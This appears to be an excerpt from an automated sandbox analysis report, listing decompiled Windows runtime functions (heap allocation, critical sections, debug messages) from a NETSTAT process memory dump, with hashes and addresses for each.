                • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                • Instruction ID: e1042c09be1f9b1d4604e4d38dddb3aae15ef9c715c62fc29f87d31d5a10aaea
                • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                • Instruction Fuzzy Hash: 8FE08C35680244ABDB229E94CC00FB9BA1A9B40BA1F104032BE085EA90C6759D92D6C8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033E41E8 Relevance: .0, Instructions: 21COMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E033E41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x34308f0);
				_t5 = E033AD08C(__ebx, __edi, __esi);
				if( *0x34487ec == 0) {
					E0336EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x34487ec == 0) {
						 *0x34487f0 = 0x34487ec;
						 *0x34487ec = 0x34487ec;
						 *0x34487e8 = 0x34487e4;
						 *0x34487e4 = 0x34487e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L033E4248();
				}
				return E033AD0D1(_t5);
			}





                0x033e41e8
                0x033e41ea
                0x033e41ef
                0x033e41fb
                0x033e4206
                0x033e420b
                0x033e4216
                0x033e421d
                0x033e4222
                0x033e422c
                0x033e4231
                0x033e4231
                0x033e4236
                0x033e423d
                0x033e423d
                0x033e4247

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f69ad318dfb646f1f55c64d678609d9d63b9ebec2b6e8fc393cc42b12196eb68
                • Instruction ID: f12bdd31809c6cfe5777fa556c3daa83cac330037483cc4e5986418d6a652523
                • Opcode Fuzzy Hash: f69ad318dfb646f1f55c64d678609d9d63b9ebec2b6e8fc393cc42b12196eb68
                • Instruction Fuzzy Hash: 64F0157C850724CEEBA0FFA9AE60728BAE4F748312F10417A8100AF688D73A4484DF05
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0338A185 Relevance: .0, Instructions: 20COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0338A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x34467e4 >= 0xa) {
					if(_t5 < 0x3446800 || _t5 >= 0x3446900) {
						return L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E03370010(0x34467e0, _t5);
				}
			}





                0x0338a190
                0x0338a1a6
                0x0338a1c2
                0x00000000
                0x00000000
                0x00000000
                0x0338a192
                0x0338a192
                0x0338a19f
                0x0338a19f

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c70b75a76e97cbb2560301ae3a3b37d9ada5953781a344492645980f58897615
                • Instruction ID: bd0b98134bace684a32aa9ae01d1bda72b585d92ed7c3efa48cd7563c7f28c88
                • Opcode Fuzzy Hash: c70b75a76e97cbb2560301ae3a3b37d9ada5953781a344492645980f58897615
                • Instruction Fuzzy Hash: A3D02E299712046AE72CF308CAD4B35B252E781B10F32082FF1034E9A0DBACC8D2810C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033816E0 Relevance: .0, Instructions: 17COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E033816E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E03381710(0x34467e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L03374620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                0x033816e8
                0x033816ef
                0x033816f3
                0x033816fe
                0x00000000
                0x03381700
                0x0338170d
                0x0338170d
                0x033816f2
                0x033816f2
                0x033816f2
                0x033816f2

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cee545f18cbf739cf36d1cc511dc384af1d4055372041fdc93df8ad3fe778e69
                • Instruction ID: b1ff69de489e453ec2dbc429758ee3b8ce06caa9c5662091e969c475306cf627
                • Opcode Fuzzy Hash: cee545f18cbf739cf36d1cc511dc384af1d4055372041fdc93df8ad3fe778e69
                • Instruction Fuzzy Hash: 52D05231A00300A2EA2DEB119C84B146252AB80B81F38006CF60A4D8C0CFA8D8A3E048
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033D53CA Relevance: .0, Instructions: 16COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E033D53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0336EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                0x033d53ca
                0x033d53ce
                0x033d53d9
                0x033d53de
                0x033d53e1
                0x033d53e1
                0x033d53e6
                0x033d53f3
                0x00000000
                0x033d53f8
                0x033d53fb

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                • Instruction ID: b5f7809d515e39468c0311c171be5c37e950d71d4e04a46cab9e8f89e29d7feb
                • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                • Instruction Fuzzy Hash: 69E08C369447809FCF12DB48CA90F5EB7F5FB45B00F180008A0085FA20C734AC01CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0336AAB0 Relevance: .0, Instructions: 12COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0336AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                0x0336aab6
                0x0336aabb
                0x033ba442
                0x00000000
                0x033ba448
                0x033ba454
                0x033ba454
                0x0336aac1
                0x0336aac1
                0x0336aac6
                0x0336aac6

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                • Instruction ID: 28cceff955f2b5c0a4fd78f97abd699bb8f54f0d2f23a1e24227fb77b9214958
                • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                • Instruction Fuzzy Hash: 5DD0E975352D80CFD616CB1DC994B5573B8BB45B44FC944E0E501CBB65E62CD984CA10
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033835A1 Relevance: .0, Instructions: 12COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E033835A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0336EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                0x033835a1
                0x033835a1
                0x033835a5
                0x033835ab
                0x033835ab
                0x033835b5
                0x00000000
                0x033835c1
                0x033835b7

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                • Instruction ID: 62adecff602d47e97db4322082b4c19e1dbc6eb258184d84b7c15ad8cd0b3169
                • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                • Instruction Fuzzy Hash: CBD0A93D8033809EDB03FB10C698768B3B6BB00A28F5C24A980020AB52C33A4A0ED700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0335DB40 Relevance: .0, Instructions: 11COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0335DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L03374620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                0x0335db4d
                0x0335db54
                0x0335db5f
                0x0335db56
                0x0335db56
                0x0335db5c
                0x0335db5c

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                • Instruction ID: e56a4ad7082ffb49d6da6c01d032643f70ec44142f65b70ffd780fcd7b3724d8
                • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                • Instruction Fuzzy Hash: 21C08C30280B00AAEB32AF20CD41F0076A1BB00B01F4800A07700DA0F0EB7CE801E600
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033DA537 Relevance: .0, Instructions: 11COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E033DA537(intOrPtr _a4, intOrPtr _a8) {

				return L03378E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                0x033da553

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                • Instruction ID: 25c4d5f69b5b796af5ffe593466d0d497563fd3edaef2d3393ae0140e4496631
                • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                • Instruction Fuzzy Hash: 1EC08C37080248BBCB22AF81CC01F06BF2AFB94B60F108010FA080F970C636E970EB84
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03373A1C Relevance: .0, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E03373A1C(intOrPtr _a4) {
				void* _t5;

				return L03374620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                0x03373a35

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                • Instruction ID: fb6092407f8fa7ccbefdd45358f25ca25d384652df343ec28da600c79821e739
                • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                • Instruction Fuzzy Hash: 6EC04C36180648BBC722AE46DD41F157B69E794B60F154021B6040A561857AED61D598
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033676E2 Relevance: .0, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E033676E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                0x033676e4
                0x00000000
                0x033676f8
                0x033676fd

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                • Instruction ID: d6f2bca8b37318210244952036454c9d83d1120ce58ba457bfb086e6cd6a04be
                • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                • Instruction Fuzzy Hash: FFC08C741412C09EEB2AD708CEA0B303655AB0860DFAC019CBA010D4A1C36CA803C208
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033836CC Relevance: .0, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E033836CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L03374620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                0x033836d2
                0x033836e8
                0x033836d4
                0x033836e5
                0x033836e5

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                • Instruction ID: 82b7932ff59de98a896f076e4759e7090732f8e4fd5853c0a1cee2cacf04beb3
                • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                • Instruction Fuzzy Hash: FFC04C79155540BADA25AF248D91B157254A740A61F6806547221495E0D56DAC00D504
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0335AD30 Relevance: .0, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0335AD30(intOrPtr _a4) {

				return L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                0x0335ad49

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                • Instruction ID: cc0eeb6de7d2a5ee8d51b18faf9c9dbcec524324efe4cce317f6d57cfc701e13
                • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                • Instruction Fuzzy Hash: C7C08C32080288BBC722AA45CD40F217B29E790B60F000020B6040A661C936E862D588
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03377D50 Relevance: .0, Instructions: 7COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E03377D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                0x03377d56
                0x03377d5b
                0x03377d60
                0x03377d5d
                0x03377d5d
                0x03377d5d

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                • Instruction ID: f20eed623ac1a85ee324ba082283834ba5da4d6e8c68d364d3bb8f8ae5b56ec0
                • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                • Instruction Fuzzy Hash: CCB092343019408FCE26DF18C480B2533E8BB48A80B8800D0E400CBA20D229E8008A00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03382ACB Relevance: .0, Instructions: 5COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E03382ACB() {
				void* _t5;

				return E0336EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                0x03382adc

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                • Instruction ID: 2b72c543d522a54f009b9af2196a2a96e9651a65036bc9cb9f656fbe724c0bae
                • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                • Instruction Fuzzy Hash: DAB01236C11540CFCF02EF40C750B197331FB00750F05849490012BA30C229AC01DB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033EFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                Download Yara Rule
                C-Code - Quality: 53%
                			E033EFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0339CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E033E5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E033E5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                0x033efdda
                0x033efde2
                0x033efde5
                0x033efdec
                0x033efdfa
                0x033efdff
                0x033efe0a
                0x033efe0f
                0x033efe17
                0x033efe1e
                0x033efe19
                0x033efe19
                0x033efe19
                0x033efe20
                0x033efe21
                0x033efe22
                0x033efe25
                0x033efe40

                APIs
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 033EFDFA
                Strings
                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 033EFE01
                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 033EFE2B
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                • API String ID: 885266447-3903918235
                • Opcode ID: 9ee0e725b3d2598902fcb902bb7e645ecfd0cfda4ade2e218592fc0ddc68b213
                • Instruction ID: fb9619a674fe901cd7bbc96dabc59636526f6d57f9f21b39f23fee0af9d960cd
                • Opcode Fuzzy Hash: 9ee0e725b3d2598902fcb902bb7e645ecfd0cfda4ade2e218592fc0ddc68b213
                • Instruction Fuzzy Hash: 7CF0F676600211BFEA209A45DC82F23BB5AEB85730F154315F6285A5E1DAA2FC3096F0
                Uniqueness

                Uniqueness Score: -1.00%